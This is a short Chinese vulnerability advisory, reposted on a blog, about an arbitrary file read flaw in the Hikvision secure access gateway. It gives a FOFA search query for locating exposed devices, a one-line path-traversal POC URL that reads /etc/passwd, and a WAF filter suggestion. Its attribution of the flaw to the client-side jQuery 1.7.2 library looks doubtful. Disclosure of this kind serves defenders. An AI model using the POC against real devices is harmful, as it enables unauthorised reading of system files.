首页 > 其他分享 >通杀?海康威视安全接入网关任意文件读取漏洞

通杀?海康威视安全接入网关任意文件读取漏洞

时间:2023-12-25 17:13:58浏览次数:41  
标签:jQuery jquery 1.7 .. 威视 接入网 JavaScript 通杀 漏洞

明:本文提供的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

 

   背景海康威视安全接入网关使用jquery-1.7.2JavaScript代码库(框架),jQuery 1.7.2版本存在任意文件读取漏洞。影响范围jquery-1.7.2FOFA:
body="webui/js/jquerylib/jquery-1.7.2.min.js"
危害级别:中

 

漏洞复现

POC:


/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down

 

除此之外,像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库(框架)的设备同样存在此漏洞


修复建议

 

临时修复:在防火墙中添加../../参数及相关变形的过滤规则。

 

goby&nuclei检测

左上角公众号回复“jquery-1.7.2”获取,供运维人员用于检测。

 

最后附百度百科:

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。

jQuery的核心特性可以总结为:具有独特的链式语法和短小清晰的多功能接口;具有高效灵活的CSS选择器,并且可对CSS选择器进行扩展;拥有便捷的插件扩展机制和丰富的插件。jQuery兼容各种主流浏览器,如IE 6.0+、FF 1.5+、Safari 2.0+、Opera 9.0+等。 [1]

 

标签:jQuery,jquery,1.7,..,威视,接入网,JavaScript,通杀,漏洞
From: https://www.cnblogs.com/xiaoyunxiaogang/p/17926509.html

相关文章

  • 通杀无限 debugger,目前只有 1% 的人知道!
    前言相信很多小伙伴在进行web逆向的时候,都遇到过无限debugger。最简单的方法,在debugger位置,点击行号,右键Neverpausehere,永远不在此处断下即可。但是这种方法就妄想通杀,显然是不大可能的,不然这种防护岂不是弄出来骗自己的。现在很多网站,这样处理是无法绕过的。例如常规......
  • 1.4 接入网和物理媒体
    指标带宽(bps)共享/专用接入住宅接入:modem(淘汰)DSL可同时上网和打电话调制解调距交换机近,城市中距离近线缆网络有线电视信号线缆双向改造FDM:在不同频段传输不同信道的数据,数字电视和上网数据(上下行)HFC:hybridfibercoax非对称:最高30Mbps的下行传......
  • 自动扣取webpack通杀方法
    1.网站和目标https://m.ctyun.cn/wap/main/auth/login破解userName,password加密2.先下断点,找到加密的地方 ......
  • 海康威视IPC摄像头rtsp接入
    海康威视IPC摄像头rtsp接入由于该设备辗转多人手中进行测试,不乏有人修改过密码等原因,导致默认的登录信息失效,因此需要使用海康威视官方渠道进行密码重置。默认信息#海康威视摄像头信息ip='192.168.1.64'port='8000'rtsp_port='554'user='admin'password='123......
  • vue页面集成海康威视web视频播放插件
    参考大神链接:https://www.jianshu.com/p/71d97362fdd81、进入海康威视官网下载web视频插件下载插件开发包:https://open.hikvision.com/download/5c67f1e2f05948198c909700?type=10 官方教程:https://open.hikvision.com/docs/docId?productId=612781c8ec4acb28e0e1c0c3&versi......
  • ZLMediaKit拉取海康威视摄像头RTSP视频流时拉流失败
    场景ZLMediaKit在Windows上实现Rtmp流媒体服务器以及模拟rtmp推流和http-flv拉流播放:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/130221608按照以上教程拉取海康威视rtsp流时发现拉流失败。然后使用VLC和ffmpeg测试时同样无法拉流。使用ffplay.exertsp流地......
  • 网页播放海康,威视,大华,华为摄像头RTSP流,延迟毫秒级,支持多路播放、H.264/H.265
    一、背景:在遍地都是摄像头的今天,往往需要在各种信息化、数字化、可视化B/S系统中集成实时视频流播放等功能,海康、大华、华为等厂家摄像头或录像机等设备一般也都遵循监控行业标准,支持国际标准的主流传输协议RTSP输出,而Chrome、Firefox、Edge等新一代浏览器从2015年开始取消了NPAPI......
  • 分布式多协议接入网关FluxMQ-2.0功能说明
    FluxMQ—2.0版本更新内容前言FLuxMQ是一款基于java开发,支持无限设备连接的云原生分布式物联网接入平台。FluxMQ基于Netty开发,底层采用Reactor3反应堆模型,具备低延迟,高吞吐量,千万、亿级别设备连接;方便企业快速构建其物联网平台与应用。FluxMQ官网:https://www.fluxmq.comFluxMQ......
  • JS逆向实战19——通杀webpack逆向
    声明本文章中所有内容仅供学习交流,抓包内容、敏感网址、数据接口均已做脱敏处理,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关,若有侵权,请联系我立即删除!网站aHR0cHM6Ly9mb2dhbmctbS5pdG91Y2h0di5jbi9tZWRpYURldGFpbC8zODc1Nw==aHR0cHM6Ly93d3cuZ205OS5jb20......
  • 海康威视产品命名规则
     海康威视摄像头命名规则。 一、电话400问的命名规则,客服给的短信,短信中的链接。海康产品命名规则(hikvision.com)海康产品命名规则2023-06-30海康威视【复制链接】您好,如果您觉得观看视频更加直观,可点击这里查看。以下是图文介绍:想了解,网络摄像机(IPC),网络高清......